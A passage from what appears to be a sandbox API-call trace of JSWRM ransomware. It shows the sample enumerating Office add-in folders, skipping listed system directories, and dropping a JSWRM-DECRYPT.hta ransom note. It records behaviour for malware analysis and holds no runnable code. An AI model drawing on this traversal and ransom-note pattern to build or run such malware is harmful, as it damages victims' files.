lpMultiByteStr=0x345e508, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.dll", lpUsedDefaultChar=0x0) returned 10 [0123.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0123.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0123.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0123.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.dll", cchWideChar=10, lpMultiByteStr=0x345e4d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.dll", lpUsedDefaultChar=0x0) returned 10 [0123.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0123.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2476a8 [0123.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0123.299] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf854e731, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="pl", cAlternateFileName="")) returned 1 [0123.299] lstrcmpiW (lpString1="pl", lpString2=".") returned 1 [0123.299] lstrcmpiW (lpString1="pl", lpString2="..") returned 1 [0123.299] lstrcmpiW (lpString1="pl", lpString2="...") returned 1 [0123.299] lstrcmpiW (lpString1="pl", lpString2="windows") returned -1 [0123.299] lstrcmpiW (lpString1="pl", lpString2="recovery") returned -1 [0123.299] lstrcmpiW (lpString1="pl", lpString2="perflogs") returned 1 [0123.299] lstrcmpiW (lpString1="pl", lpString2="documents and settings") returned 1 [0123.299] lstrcmpiW (lpString1="pl", lpString2="$RECYCLE.BIN") returned 1 [0123.299] lstrcmpiW (lpString1="pl", lpString2="system volume information") returned -1 [0123.299] lstrcmpiW (lpString1="pl", lpString2="msocache") returned 1 [0123.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0123.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.299] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\pl\\jswrm-decrypt.hta")) returned 0xffffffff [0123.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0123.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0123.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\pl\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.301] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.301] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.302] CloseHandle (hObject=0x338) returned 1 [0123.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.303] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pl\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\pl\\jswrm-decrypt.hta")) returned 0x20 [0123.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.303] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\pl\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf854e731, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4027f720, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0123.303] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.303] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf854e731, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4027f720, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.303] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.303] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.303] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4027f720, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4027f720, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4027f720, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.303] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.303] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.303] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.303] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.303] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.303] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.303] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.303] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.303] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.303] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0123.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0123.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0123.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0123.304] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c895d2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4c895d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4caf7cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0123.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0123.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0123.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0123.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244e58 [0123.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.304] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x865a7d2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.304] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0123.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0123.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0123.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0123.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0123.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244e58 | out: hHeap=0x1e0000) returned 1 [0123.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.305] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaac403, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaac403, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1698075, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.305] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0123.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0123.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244d20 [0123.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0123.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.306] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf854e731, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf854e731, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf8574958, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8eaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.306] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.306] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.306] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.306] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.306] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.306] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.306] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.306] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.306] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.306] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0123.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, 